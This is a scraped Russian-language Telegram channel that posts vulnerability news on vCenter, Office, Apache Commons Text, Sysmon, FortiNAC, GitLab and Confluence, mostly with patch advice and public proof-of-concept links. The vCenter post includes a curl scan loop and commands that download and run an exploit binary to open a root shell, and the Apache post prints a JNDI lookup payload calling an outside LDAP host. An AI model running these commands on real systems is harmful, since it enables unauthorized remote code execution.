SecuriXy.kz
1.22K subscribers
394 photos
13 videos
11 files
293 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Download Telegram
Надеюсь все обновились от #VMWare vCenter Server File Upload to #RCE #CVE-2021-22005

как проверить:
cat vmware_centers.txt | while read S do; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \033[1;35mVulnerable\e[0m\n" || printf "$S \033[1;32mPatched\e[0m\n"; done;

Если Ваши админы еще не вразумили - рутуйтесь:
wget https://github.com/r0ckysec/CVE-2021-22005/raw/main/exp/cve-2021-22005_exp_linux; chmod +x
cve-2021-22005_exp_linux;

./cve-2021-22005_exp_linux -u https://IP --shell
Срочно обновлять офис…

Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)

#MSOffice #RCE #CVE
#CVE-2022-42889 #Apache #RCE #4Shell

Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.

Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/

---
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
Вышел Sysmon 14.13 (закрыта #CVE-2022-41120 CVSS:3.1 7.8/6.8).
🔗 https://techcommunity.microsoft.com/t5/sysinternals-blog/active-directory-explorer-v1-52-contig-v1-82-and-sysmon-v14-13/ba-p/3685500

Поторопитесь ибо PoC так же вышел!
Here is #PoC for CVE-2022-41120 https://t.co/oXkBYi4bWk. I combined arb file delete and limited arb file write to get code execution as NT Authority\System.
🔗 https://github.com/Wh04m1001/SysmonEoP
Forwarded from APT
💥 Fortinet FortiNAC Unauthenticated RCE

On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.

PoC:
https://github.com/horizon3ai/CVE-2022-39952

Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/

#fortinet #fortinac #rce #cve
🚨 Urgent Security Update: Critical Flaw in GitLab Pipeline 🚨

(CVE-2023-4998) impacting versions 13.12 through 16.2.7 and 16.3 through 16.3.4 of GitLab Community Edition (CE) and Enterprise Edition (EE). The flaw allows attackers to impersonate users, potentially resulting in unauthorized access to sensitive data and code execution.

This flaw was initially rated as medium-severity (CVE-2023-3932) but was escalated to critical due to its potential impact.

The affected versions have been patched in GitLab Community Edition and Enterprise Edition 16.3.4 and 16.2.7. If you are using an earlier version, consider the provided mitigation steps outlined in the bulletin.

https://about.gitlab.com/releases/2023/09/18/security-release-gitlab-16-3-4-released/

#GitLab #CVE-2023-4998
https://patchapalooza.com

Удобный сервис от Alexander Hagenah по виндовым апдейтам и другим продуктам мелкомягких... Есть Rest API для удобства встраивания в свои продукты мониторинга
#CVE #Microsoft
Очень удобный скрипт по поиску описания уязвимости и публичных сплоитов к ним...

https://github.com/xaitax/SploitScan?tab=readme-ov-file

#CVE #Sploitscan #Toolkits
#CVE-2023-22527 #RCE (Remote Code Execution) Vulnerability In #Confluence Data Center and Confluence Server with #CVSS v3: 10/10

Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.

Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.

Note: 7.19.x LTS versions are not affected by this vulnerability

Product
Confluence Data Center and Server

Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

https://www.opencve.io/cve/CVE-2023-22527

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

PoC: https://github.com/cleverg0d/CVE-2023-22527/tree/main